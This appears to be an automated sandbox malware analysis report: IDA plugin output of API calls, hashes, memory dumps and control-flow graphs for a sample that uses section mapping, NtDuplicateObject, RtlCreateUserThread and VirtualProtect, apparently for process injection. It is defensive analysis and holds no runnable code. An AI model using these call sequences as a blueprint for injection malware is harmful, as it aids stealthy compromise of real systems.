                                                            • Instruction ID: f143fc5c02ddd37e0eb1527502c53b4c792090aed7660466ee145819332fc169
                                                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                            • Instruction Fuzzy Hash: BE112779A00208EFDB01DF98C995E99BBF5AF08351F0580A4F9589B362D371EA90DF90
                                                            APIs
                                                            • Sleep.KERNELBASE(00001388), ref: 00401936
                                                              • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                              • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                              • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1817377726.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Section$CreateDuplicateObjectSleepView
                                                            • String ID:
                                                            • API String ID: 1885482327-0
                                                            • Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                            • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                                            • Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                            • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F
                                                            APIs
                                                            • LocalAlloc.KERNELBASE(00000000,02B18CE4,00415E4B), ref: 004157B8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1817408197.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40b000_file.jbxd
                                                            Similarity
                                                            • API ID: AllocLocal
                                                            • String ID:
                                                            • API String ID: 3494564517-0
                                                            • Opcode ID: 74057e30488fa2548e774f69ad24f16fb778dc8554d8f99b62281b18be0c0aab
                                                            • Instruction ID: 1a08001e757156177e4176ef5c7bf10d863cb70e7c1df62a2ddb33f564a894ee
                                                            • Opcode Fuzzy Hash: 74057e30488fa2548e774f69ad24f16fb778dc8554d8f99b62281b18be0c0aab
                                                            • Instruction Fuzzy Hash: 53B092B09822009BE240CBA0A844B513A68B308342F414421F508C6180DA2054208F14
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1818600751.0000000002D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2d80000_file.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .$GetProcAddress.$l
                                                            • API String ID: 0-2784972518
                                                            • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                            • Instruction ID: 9d161aee42b0abed303ff5aa5651cd11f41ae20b825f0027bc5e713653254f0d
                                                            • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                            • Instruction Fuzzy Hash: E3314AB6900609DFDB10DF99C880AAEBBF9FF48725F19404AD841A7310D771EA49CFA4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1818742060.0000000002DB7000.00000040.00000020.00020000.00000000.sdmp, Offset: 02DB7000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2db7000_file.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                            • Instruction ID: 4606215b86b38e79a70f774fa23c84c78a1783bd1ab180d3ddd44312b63c7196
                                                            • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                            • Instruction Fuzzy Hash: 85117C72344100EFD744DF55DCA0FE673EAEF89260B298065E909CB756E679EC02CB60
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1817377726.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
                                                            • Instruction ID: 8df8bbe6331efc2743c071309605838865bd09ee4bc9229f5037613db63a7100
                                                            • Opcode Fuzzy Hash: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
                                                            • Instruction Fuzzy Hash: 3CF0F0A1E2E243AFCA0A1E34A916532AF1C751632372401FFA083752C2E23D0B17619F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1817377726.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
                                                            • Instruction ID: 9241026e722b7dd7cbe781a55eac82938fa1721c21c2f19ebd5655df2a8ce19b
                                                            • Opcode Fuzzy Hash: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
                                                            • Instruction Fuzzy Hash: 90F024A191E281DBCA0E1E2858169327F1C7A5230733405FF9093762C2E13D8B02619F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1818600751.0000000002D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2d80000_file.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                            • Instruction ID: 194ead901159a628181f825eb44f9653329cd22276f99499c8f77ff8fb7f40a2
                                                            • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                            • Instruction Fuzzy Hash: B701A276A116048FDF21EF24C805BAB33E5FB86317F4584A5D90A97381E774AD49CB90
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1817377726.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
                                                            • Instruction ID: 0b233a05c36d383cd3dc693d5d52553799fa9f094e89171df70cdd77f1a33a14
                                                            • Opcode Fuzzy Hash: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
                                                            • Instruction Fuzzy Hash: 5CF027A1E6E202ABCA0E1E20AD165727F4D651132372401FFA053B63C1E17D4B07619F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1817377726.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
                                                            • Instruction ID: 61f4eeca6a5bdba97633f9ce55ed0ebe4cfc5c7823726c26b0d716f95b27c2a1
                                                            • Opcode Fuzzy Hash: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
                                                            • Instruction Fuzzy Hash: 1EF027A191E242DBCA0D2E246D158322F4C295530733401FF9053B92C2E03E8B07619F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1817377726.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
                                                            • Instruction ID: 50319dc6f67c7bb301174255112627998741b5b21f267b3f7f348d4aa007f6d0
                                                            • Opcode Fuzzy Hash: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
                                                            • Instruction Fuzzy Hash: A5E068A2D2E2029BCA1E1E206D464333F4C625630B72001FF9053B92C1F03E4B0661DF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1817377726.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
                                                            • Instruction ID: 65af031b81eeafed772fbc50416c1b4fdc84f259fd59d49ecec168145e9dac47
                                                            • Opcode Fuzzy Hash: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
                                                            • Instruction Fuzzy Hash: 3EE0ED92E6E2854BCAA52E30980A1623F5C69A331A32480FFA002A52D2F03E0F05815B
                                                            APIs
                                                            • BuildCommDCBA.KERNEL32(00000000,?), ref: 004159E1
                                                            • WritePrivateProfileStringA.KERNEL32(00417384,0041735C,00417330,0041730C), ref: 00415A05
                                                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00415A0D
                                                            • GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 00415A4D
                                                            • GetComputerNameW.KERNEL32(?,?), ref: 00415A61
                                                            • SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00415A6F
                                                            • OpenJobObjectA.KERNEL32(00000000,00000000,004173B4), ref: 00415A7E
                                                            • GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 00415A8F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1817408197.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40b000_file.jbxd
                                                            Similarity
                                                            • API ID: Name$AvailableBuildCalendarCommComputerEnvironmentFreeInfoMemoryNodeNumaObjectOpenPathPrivateProfileShortStringStringsWrite
                                                            • String ID: -
                                                            • API String ID: 113859268-2547889144
                                                            • Opcode ID: 14f241474e9e1da913b15f4f6307fbc2b0786e210afcc624a3eb522448752a14
                                                            • Instruction ID: 11b84fe8b2b04f3d00d3004244583e2a87b640e11e3fb3d6ac6cb40e453acbe7
                                                            • Opcode Fuzzy Hash: 14f241474e9e1da913b15f4f6307fbc2b0786e210afcc624a3eb522448752a14
                                                            • Instruction Fuzzy Hash: 7821F731A84308EBD720DF94DC86BD97B70EF4C752F1181AAFA49AA1C0CAB459C4CB59
                                                            APIs
                                                            • QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00415B04
                                                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00415B1F
                                                            • HeapDestroy.KERNEL32(00000000), ref: 00415B3E
                                                            • GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 00415B46
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1817408197.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40b000_file.jbxd
                                                            Similarity
                                                            • API ID: DestroyDeviceEnvironmentFreeHeapHighestNodeNumaNumberQueryStrings
                                                            • String ID:
                                                            • API String ID: 367530164-0
                                                            • Opcode ID: c6f65e21e8c25656cd2b46d0446d16c4be618aaecae73d91b7960579b50528bf
                                                            • Instruction ID: 9b1347604edf95c8b03cd5cfcdcf1f5faacd6efc657b722f8f0869e5d5630474
                                                            • Opcode Fuzzy Hash: c6f65e21e8c25656cd2b46d0446d16c4be618aaecae73d91b7960579b50528bf
                                                            • Instruction Fuzzy Hash: 4E01A270A86504DBE650EBA4ED85BDA7BB8F70C346F404037E60A97280DA746D54CB9A

                                                            Execution Graph

                                                            Execution Coverage:9.4%
                                                            Dynamic/Decrypted Code Coverage:29.4%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:163
                                                            Total number of Limit Nodes:7
                                                            execution_graph 3390 402e40 3392 402e37 3390->3392 3393 402edf 3392->3393 3394 4018e6 3392->3394 3395 4018f5 3394->3395 3396 40192e Sleep 3395->3396 3397 401949 3396->3397 3399 40195a 3397->3399 3400 401514 3397->3400 3399->3393 3401 401524 3400->3401 3402 4015c4 NtDuplicateObject 3401->3402 3408 4016e0 3401->3408 3403 4015e1 NtCreateSection 3402->3403 3402->3408 3404 401661 NtCreateSection 3403->3404 3405 401607 NtMapViewOfSection 3403->3405 3406 40168d 3404->3406 3404->3408 3405->3404 3407 40162a NtMapViewOfSection 3405->3407 3406->3408 3409 401697 NtMapViewOfSection 3406->3409 3407->3404 3410 401648 3407->3410 3408->3399 3409->3408 3411 4016be NtMapViewOfSection 3409->3411 3410->3404 3411->3408 3431 415f60 3434 415b60 3431->3434 3433 415f65 3435 415b6d 3434->3435 3436 415d50 3435->3436 3437 415c27 InterlockedCompareExchange ReadConsoleA FindAtomW SetConsoleMode SearchPathW 3435->3437 3438 415d60 SetCommState 3436->3438 3442 415d79 3436->3442 3439 415c8d 7 API calls 3437->3439 3438->3436 3440 415d41 3439->3440 3441 415d3a PulseEvent 3439->3441 3440->3436 3441->3440 3443 415e46 3442->3443 3444 415d86 7 API calls 3442->3444 3455 4157b0 LocalAlloc 3443->3455 3451 415e1a 3444->3451 3448 415e4b LoadLibraryA 3456 4157e0 GetModuleHandleW GetProcAddress VirtualProtect 3448->3456 3449 415e9d 3457 415ad0 3449->3457 3451->3443 3452 415ea2 3453 415ed9 InterlockedDecrement 3452->3453 3454 415eef 3452->3454 3453->3452 3454->3433 3455->3448 3456->3449 3458 415af9 QueryDosDeviceW 3457->3458 3459 415b0a 3457->3459 3458->3459 3468 415970 3459->3468 3462 415b25 3471 4159b0 3462->3471 3463 415b1d FreeEnvironmentStringsA 3463->3462 3466 415b4c 3466->3452 3467 415b3c HeapDestroy GetNumaHighestNodeNumber 3467->3466 3469 415981 FatalAppExitA GetModuleHandleW 3468->3469 3470 415993 3468->3470 3469->3470 3470->3462 3470->3463 3472 4159bd 3471->3472 3473 4159e9 3472->3473 3474 4159d8 BuildCommDCBA 3472->3474 3475 4159f1 WritePrivateProfileStringA FreeEnvironmentStringsA 3473->3475 3478 415a13 3473->3478 3474->3478 3475->3478 3477 415a9a 3477->3466 3477->3467 3478->3477 3479 415a49 GetNumaAvailableMemoryNode GetComputerNameW SetCalendarInfoA OpenJobObjectA GetShortPathNameW 3478->3479 3480 4159a0 3478->3480 3479->3478 3483 415930 3480->3483 3484 415959 3483->3484 3485 41594c SetEvent 3483->3485 3484->3478 3485->3484 3562 401542 3563 40153b 3562->3563 3564 4015c4 NtDuplicateObject 3563->3564 3573 4016e0 3563->3573 3565 4015e1 NtCreateSection 3564->3565 3564->3573 3566 401661 NtCreateSection 3565->3566 3567 401607 NtMapViewOfSection 3565->3567 3568 40168d 3566->3568 3566->3573 3567->3566 3569 40162a NtMapViewOfSection 3567->3569 3570 401697 NtMapViewOfSection 3568->3570 3568->3573 3569->3566 3571 401648 3569->3571 3572 4016be NtMapViewOfSection 3570->3572 3570->3573 3571->3566 3572->3573 3486 2d59d76 3487 2d59d85 3486->3487 3490 2d5a516 3487->3490 3491 2d5a531 3490->3491 3492 2d5a53a CreateToolhelp32Snapshot 3491->3492 3493 2d5a556 Module32First 3491->3493 3492->3491 3492->3493 3494 2d5a565 3493->3494 3495 2d59d8e 3493->3495 3497 2d5a1d5 3494->3497 3498 2d5a200 3497->3498 3499 2d5a211 VirtualAlloc 3498->3499 3500 2d5a249 3498->3500 3499->3500 3500->3500 3536 2cc0005 3541 2cc092b GetPEB 3536->3541 3538 2cc0030 3543 2cc003c 3538->3543 3542 2cc0972 3541->3542 3542->3538 3544 2cc0049 3543->3544 3545 2cc0e0f 2 API calls 3544->3545 3546 2cc0223 3545->3546 3547 2cc0d90 GetPEB 3546->3547 3548 2cc0238 VirtualAlloc 3547->3548 3549 2cc0265 3548->3549 3550 2cc02ce VirtualProtect 3549->3550 3552 2cc030b 3550->3552 3551 2cc0439 VirtualFree 3555 2cc04be LoadLibraryA 3551->3555 3552->3551 3554 2cc08c7 3555->3554 3556 2cc0001 3557 2cc0005 3556->3557 3558 2cc092b GetPEB 3557->3558 3559 2cc0030 3558->3559 3560 2cc003c 7 API calls 3559->3560 3561 2cc0038 3560->3561 3412 2cc003c 3413 2cc0049 3412->3413 3425 2cc0e0f SetErrorMode SetErrorMode 3413->3425 3418 2cc0265 3419 2cc02ce VirtualProtect 3418->3419 3421 2cc030b 3419->3421 3420 2cc0439 VirtualFree 3424 2cc04be LoadLibraryA 3420->3424 3421->3420 3423 2cc08c7 3424->3423 3426 2cc0223 3425->3426 3427 2cc0d90 3426->3427 3428 2cc0dad 3427->3428 3429 2cc0dbb GetPEB 3428->3429 3430 2cc0238 VirtualAlloc 3428->3430 3429->3430 3430->3418 3621 402dd0 3623 402ddc 3621->3623 3622 4018e6 8 API calls 3624 402edf 3622->3624 3623->3622 3623->3624 3517 4018f1 3518 4018f6 3517->3518 3519 40192e Sleep 3518->3519 3520 401949 3519->3520 3521 401514 7 API calls 3520->3521 3522 40195a 3520->3522 3521->3522 3625 415792 3626 41579b GetModuleHandleW GetProcAddress VirtualProtect 3625->3626 3608 401915 3609 4018c6 3608->3609 3610 40191a 3608->3610 3611 40192e Sleep 3610->3611 3612 401949 3611->3612 3613 40195a 3612->3613 3614 401514 7 API calls 3612->3614 3614->3613 3501 402f97 3502 4030ee 3501->3502 3503 402fc1 3501->3503 3503->3502 3504 40307c RtlCreateUserThread NtTerminateProcess 3503->3504 3504->3502 3598 402d7b 3599 402d38 3598->3599 3599->3598 3600 402dc7 3599->3600 3601 4018e6 8 API calls 3599->3601 3601->3600 3523 4014fe 3524 401506 3523->3524 3525 401531 3523->3525 3526 4015c4 NtDuplicateObject 3525->3526 3532 4016e0 3525->3532 3527 4015e1 NtCreateSection 3526->3527 3526->3532 3528 401661 NtCreateSection 3527->3528 3529 401607 NtMapViewOfSection 3527->3529 3530 40168d 3528->3530 3528->3532 3529->3528 3531 40162a NtMapViewOfSection 3529->3531 3530->3532 3533 401697 NtMapViewOfSection 3530->3533 3531->3528 3534 401648 3531->3534 3533->3532 3535 4016be NtMapViewOfSection 3533->3535 3534->3528 3535->3532

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 415b60-415b88 2 415b90-415b97 0->2 3 415b99-415b9b 2->3 4 415b9f-415ba5 2->4 3->4 5 415ba7-415bb1 4->5 6 415bb6-415bc0 4->6 5->6 7 415bc2-415bce 6->7 8 415bd8-415bdf 6->8 7->8 8->2 9 415be1-415be9 8->9 11 415bf0-415bf6 9->11 12 415c04-415c0b 11->12 13 415bf8-415bfe 11->13 14 415c11-415c18 12->14 15 415c0d 12->15 13->12 14->11 16 415c1a-415c21 14->16 15->14 17 415d50-415d5e 16->17 18 415c27-415d38 InterlockedCompareExchange ReadConsoleA FindAtomW SetConsoleMode SearchPathW SetDefaultCommConfigW MoveFileW GetVersionExW DisconnectNamedPipe ReadConsoleOutputW GetModuleFileNameA LCMapStringA 16->18 19 415d60-415d6e SetCommState 17->19 22 415d41-415d4d 18->22 23 415d3a-415d3b PulseEvent 18->23 24 415d70-415d77 19->24 25 415d79-415d80 19->25 22->17 23->22 24->19 24->25 26 415e46-415e55 call 4157b0 25->26 27 415d86-415e40 GetConsoleAliasesLengthA GetStringTypeExW BuildCommDCBA GetTimeFormatW GetFileAttributesA GetConsoleAliasExesLengthA GetBinaryType 25->27 33 415e57-415e68 26->33 34 415e8d-415e98 LoadLibraryA call 4157e0 26->34 27->26 35 415e70-415e80 33->35 40 415e9d-415eae call 415ad0 34->40 38 415e82 35->38 39 415e88-415e8b 35->39 38->39 39->34 39->35 45 415eb0-415eb7 40->45 46 415ec3-415ec9 45->46 47 415eb9-415ebf 45->47 48 415ed0-415ed7 46->48 49 415ecb call 4157d0 46->49 47->46 53 415ee6-415eed 48->53 54 415ed9-415ee0 InterlockedDecrement 48->54 49->48 53->45 56 415eef-415eff 53->56 54->53 57 415f00-415f10 56->57 58 415f12 57->58 59 415f19-415f1c 57->59 58->59 59->57 60 415f1e-415f29 59->60 61 415f30-415f35 60->61 62 415f37-415f3d 61->62 63 415f3f-415f45 61->63 62->63 64 415f47-415f54 62->64 63->61 63->64
                                                            APIs
                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00415C32
                                                            • ReadConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 00415C4B
                                                            • FindAtomW.KERNEL32(00000000), ref: 00415C52
                                                            • SetConsoleMode.KERNEL32(00000000,00000000), ref: 00415C5A
                                                            • SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00415C72
                                                            • SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 00415C99
                                                            • MoveFileW.KERNEL32(00000000,00000000), ref: 00415CA1
                                                            • GetVersionExW.KERNEL32(?), ref: 00415CAE
                                                            • DisconnectNamedPipe.KERNEL32(?), ref: 00415CC1
                                                            • ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 00415D06
                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00415D15
                                                            • LCMapStringA.KERNEL32(00000000,00000000,004173C0,00000000,?,00000000), ref: 00415D2B
                                                            • PulseEvent.KERNEL32(00000000), ref: 00415D3B
                                                            • SetCommState.KERNELBASE(00000000,00000000), ref: 00415D64
                                                            • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00415D95
                                                            • GetStringTypeExW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 00415DA6
                                                            • BuildCommDCBA.KERNEL32(00000000,00000000), ref: 00415DAE
                                                            • GetTimeFormatW.KERNEL32(00000000,00000000,?,004173EC,?,00000000), ref: 00415DEE
                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00415DF5
                                                            • GetConsoleAliasExesLengthA.KERNEL32 ref: 00415DFB
                                                            • GetBinaryType.KERNEL32(0041742C,?), ref: 00415E0D
                                                            • LoadLibraryA.KERNELBASE(00417438), ref: 00415E92
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2088220630.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_40b000_trbwcit.jbxd
                                                            Similarity
                                                            • API ID: Console$CommFile$LengthReadStringType$AliasAliasesAtomAttributesBinaryBuildCompareConfigDefaultDisconnectEventExchangeExesFindFormatInterlockedLibraryLoadModeModuleMoveNameNamedOutputPathPipePulseSearchStateTimeVersion
                                                            • String ID: k`$}$
                                                            • API String ID: 2545807588-956986773
                                                            • Opcode ID: c39809a0e87fd44c053065795a214b46b35c2f87788abebbe67deec486c5fac3
                                                            • Instruction ID: c6a02c0327a8ca2811bf3dc5f08980216b947ce058d02ad4a82b71acd99ee3cb
                                                            • Opcode Fuzzy Hash: c39809a0e87fd44c053065795a214b46b35c2f87788abebbe67deec486c5fac3
                                                            • Instruction Fuzzy Hash: 4FA10271802A24DBC720DB64EC48ADB7B79FF89351F41406AF50AA7150DB385A81CFAD

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 151 401514-401533 153 401524-40152f 151->153 154 401536-40156e call 401193 151->154 153->154 163 401570 154->163 164 401573-401578 154->164 163->164 166 401898-4018a0 164->166 167 40157e-40158f 164->167 166->164 172 4018a5-4018b7 166->172 170 401595-4015be 167->170 171 401896 167->171 170->171 181 4015c4-4015db NtDuplicateObject 170->181 171->172 177 4018c5 172->177 178 4018bc-4018e3 call 401193 172->178 177->178 181->171 182 4015e1-401605 NtCreateSection 181->182 185 401661-401687 NtCreateSection 182->185 186 401607-401628 NtMapViewOfSection 182->186 185->171 187 40168d-401691 185->187 186->185 188 40162a-401646 NtMapViewOfSection 186->188 187->171 191 401697-4016b8 NtMapViewOfSection 187->191 188->185 192 401648-40165e 188->192 191->171 194 4016be-4016da NtMapViewOfSection 191->194 192->185 194->171 196 4016e0 call 4016e5 194->196
                                                            APIs
                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2088198793.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_trbwcit.jbxd
                                                            Similarity
                                                            • API ID: Section$View$Create$DuplicateObject
                                                            • String ID:
                                                            • API String ID: 1546783058-0
                                                            • Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                            • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                                            • Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                            • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 198 4014fe-401503 199 401531-40156e call 401193 198->199 200 401506-401511 198->200 210 401570 199->210 211 401573-401578 199->211 210->211 213 401898-4018a0 211->213 214 40157e-40158f 211->214 213->211 219 4018a5-4018b7 213->219 217 401595-4015be 214->217 218 401896 214->218 217->218 228 4015c4-4015db NtDuplicateObject 217->228 218->219 224 4018c5 219->224 225 4018bc-4018e3 call 401193 219->225 224->225 228->218 229 4015e1-401605 NtCreateSection 228->229 232 401661-401687 NtCreateSection 229->232 233 401607-401628 NtMapViewOfSection 229->233 232->218 234 40168d-401691 232->234 233->232 235 40162a-401646 NtMapViewOfSection 233->235 234->218 238 401697-4016b8 NtMapViewOfSection 234->238 235->232 239 401648-40165e 235->239 238->218 241 4016be-4016da NtMapViewOfSection 238->241 239->232 241->218 243 4016e0 call 4016e5 241->243
                                                            APIs
                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2088198793.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_trbwcit.jbxd
                                                            Similarity
                                                            • API ID: Section$CreateDuplicateObjectView
                                                            • String ID:
                                                            • API String ID: 1652636561-0
                                                            • Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                            • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                                            • Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                            • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
